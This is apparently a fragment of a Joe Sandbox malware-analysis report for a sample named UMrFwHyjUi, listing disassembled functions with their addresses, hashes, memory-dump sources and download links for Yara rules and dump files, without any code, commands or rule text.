                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                            • Instruction ID: ef403248f6465ce924c73df952aeb5fa0d00991603fdee2bc6e39f5fcbb3bbe7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70C14D63D4F9F3458B36466E445823EEEA26E91B4132FC3B9DCD03F189C726AD0696D0
                                                                                                                                                                                                                            Function 001EF611 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                            • Instruction ID: 21af4a1dfec58e9dff6663561532ac8617787a7a2bae5b1c94228d69bbeb53d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98C14D73D5F9F3068B36456E041822EFEA26E91B4131F83B9DDD03F1898726AD0696D0
                                                                                                                                                                                                                            Function 001AF840 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                                                                                                            • Opcode ID: adf6f6fd3724b68fc478a4f197a2cb7b71dd8542a56646f7a41404ec2b255ab6
                                                                                                                                                                                                                            • Instruction ID: 392ca8dc1c8509c66e0ab4c854f3f7e363c92238fd0952fa52dc1b6f6c6f003a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adf6f6fd3724b68fc478a4f197a2cb7b71dd8542a56646f7a41404ec2b255ab6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92B1E3795007059BCB389FA4CC92BB7B3A9EF56318F14443DE987C7580EBB5A986CB10
                                                                                                                                                                                                                            Function 001EF273 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                            • Instruction ID: dade98f2e3b7d79b7e9def0f54beb32ed7572f6e05bbbfe360aac6c7cce0e09e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4B14D73D4F9F3068B36856E445822FEEA26E91B4132BC3B9DDD03F189C726AD0695D0
                                                                                                                                                                                                                            Function 0019F9EC Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ee843f90b0c733447e0eb372004e9bdbb6e1092b743d633f7ed7c53d62122d6b
                                                                                                                                                                                                                            • Instruction ID: ef6652bbb98d651b9416a71dbae995db918b78ad4e477f501a17f7184ac79dd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee843f90b0c733447e0eb372004e9bdbb6e1092b743d633f7ed7c53d62122d6b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB1007090060AABCF28CF68C4A1ABEBBF1AF55714F24463ED85BD7291C731A947CB41
                                                                                                                                                                                                                            Function 001DD7B7 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                                                                                                                                                                                            • Instruction ID: e4250786d08d0e3794c8b5e2e62e2ace0a0f70493f0441875be1ee784f949fa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72210D21A70AE306CB858FF8FCC021277D1CBCD21BB5EC2B9CE54C9176D16DE6228590
                                                                                                                                                                                                                            Function 001C350D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                            • Instruction ID: bc8b5f5a6960358141b270876c859bdc0ff882717f18cf6003af8f88f4535006
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAF08232A00110EBCF10CF59D804FAAFBB8EB53760F25B058E409B3100C330EE10DA98
                                                                                                                                                                                                                            Function 00192F17 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 04ebc1d8d6d39ddb58e30dc1d137773cb06cdc4b4f981e51509c274c3f1eb82d
                                                                                                                                                                                                                            • Instruction ID: eaef2002c1152588227ce0ce85683398804df8c58fd49e4711e36b25ded99b50
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04ebc1d8d6d39ddb58e30dc1d137773cb06cdc4b4f981e51509c274c3f1eb82d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE092B1609204B7E3189B14D55AB5B76E9FBD9700F10803CF14ADB7D4DFB8A84887D6
                                                                                                                                                                                                                            Function 001ACC6F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c9be6b6f35371869e062396f73cb3a676a20dd67872fdeac340a7b63f963c531
                                                                                                                                                                                                                            • Instruction ID: d5c9b5cecad0a0bc06efad844ebd1e0c1774edce89437ac664fa1d13ef0a2934
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9be6b6f35371869e062396f73cb3a676a20dd67872fdeac340a7b63f963c531
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7E08C72921228EBCB24DB88C90498AF3ECEB46B10F110496B505D3201C370DF00CBD0
                                                                                                                                                                                                                            Function 001C317D Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                                                            • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                                                                                                                                                            Function 001DA63C Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                            • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                                            Function 001A3BBE Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5235bc6f45b747b251e4dee57095da2f280f55043986cdd14d68c6e044f9f23d
                                                                                                                                                                                                                            • Instruction ID: 393c624c63770748ced812bc2f6ebea4908816b08aedbaaa32699303a7a81189
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5235bc6f45b747b251e4dee57095da2f280f55043986cdd14d68c6e044f9f23d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37C0803C10074846CD15451082753643355A7937C1F40148CD46607641C72D5D45D611
                                                                                                                                                                                                                            Function 001C34EA Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                            • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                            Function 001C3502 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                            • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                                            Function 001E4606 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
